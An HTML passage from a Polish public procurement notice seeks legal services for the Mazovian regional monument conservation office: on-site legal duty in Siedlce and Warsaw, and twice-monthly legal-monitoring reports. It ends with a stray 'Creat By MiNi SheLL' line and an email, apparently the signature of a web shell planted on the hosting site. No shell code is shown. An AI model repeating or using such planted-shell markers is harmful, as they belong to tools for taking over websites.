<li>2. doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Siedlcach przy ulicy Bema 4A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Siedlcach przy ulicy Bema 4A, o charakterze stałym i w  zakresie:
a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji:  kontrolnych, oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Siedlcach przy ul. Bema 4A w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.25</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Warszawie przy ulicy Nowy Świat 18/20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Warszawie przy ulicy Nowy Świat 18/20, o charakterze stałym i w zakresie:

a)	sporządzania opinii prawnych,
b)	zastępstwa procesowego i prawnego; przygotowania, prowadzenia i reprezentowania przed sądami powszechnymi i administracyjnymi, organami administracji państwowej oraz samorządowej,
c)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
d)	uczestniczenia w miarę potrzeb w negocjacjach urzędu z poddostawcami i innymi instytucjami,
e)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
f)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu
g)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
h)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
i)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
j)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
k)	analizy pod względem prawnym dokumentacji przetargowej,
l)	udział w posiedzeniach stałych i doraźnych komisji: kontrolnych oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Zamawiającego w Warszawie przy ul. Nowy Świat 18/20 w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.25</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną polegającą na sporządzaniu raportu z monitorowania obszaru prawnego, zgodnie ze specyfikacją i wzorem stanowiącym załącznik nr 9 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Monitorowane winny być przepisy prawne dotyczące funkcjonowania Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w zakresie ochrony zabytków, finansów publicznych, prawa pracy, służby cywilnej, kodeksu postępowania administracyjnego, archiwów zakładowych, regulacji o charakterze administracyjnym a w szczególności niżej wskazane uregulowania prawne (wraz z aktami wykonawczymi):
1.	Ustawa o ochronie zabytków i opiece nad zabytkami,
2.	Ustawa o planowaniu i zagospodarowaniu przestrzennym,
3.	Ustawa prawo budowlane,
4.	Ustawa o ochronie przyrody,
5.	Ustawa o gospodarce nieruchomościami,
6.	Ustawa o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa,
7.	Ustawa o ochronie gruntów rolnych i leśnych,
8.	Ustawa o cmentarzach i chowaniu zmarłych,
9.	Ustawa o lasach,
10.	Ustawa o stosunku Państwa do Kościoła katolickiego w Rzeczypospolitej Polskiej,
11.	Ustawa o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko,
12.	Ustawa o drogach publicznych,
13.	Ustawa o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych,
14.	Kodeks postępowania administracyjnego,
15.	Ustawa o opłacie skarbowej,
16.	Ustawa o postępowaniu egzekucyjnym w administracji,
17.	Rozporządzenia Komisji Wspólnoty Europejskiej z zakresu wywozu/eksportu oraz obrotu zabytkami/dobrami kultury,
18.	Kodeks pracy,
19.	Ustawa o służbie cywilnej,
20.	Ustawa o wolontariacie,
21.	Ustawa o ochronie informacji niejawnych,
22.	Ustawa o czasie prasy kierowców,
23.	Prawo zamówień publicznych,
24.	Ustawa o finansach publicznych,
25.	Ustawa o rachunkowości,
26.	Ustawa o rachunkowości budżetowej,
27.	Ustawa o dostępie do informacji publicznej,
28.	Ustawa o ochronie danych osobowych,
29.	Ustawa o administracji rządowej w województwie,
30.	Ustawy o wojewodzie i administracji rządowej w województwie,
31.	Kodeks etyki służby cywilnej,
32.	Przepisy wskazane w części III niniejszego SIWZ,
33.	Inne przepisy dotyczące ochrony zabytków i funkcjonowania Wojewódzkich Urzędów Ochrony Zabytków, 

Częstotliwość raportów: 
Raporty powinny obejmować okres 1 miesiąca, być przygotowane zgodnie ze wzorem wskazanym w załączniku nr 9 do SIWZ, następować po sobie. Raport przesyłany elektronicznie do wyznaczonego pracownika urzędu z Wydziału Kadr, Organizacji i Administracji i dostępny dla wszystkich pracowników urzędu. Raport winien być wysyłany dwa razy w miesiącu: 1 (pierwszy) raport obejmuje 1-15 dni (pierwsze piętnaście dni miesiąca) , drugi raport obejmuje dni od 16 do końca miesiąca. Raport jest wysyłany do urzędu następnego dnia po zakończeniu danego okresu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.25</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com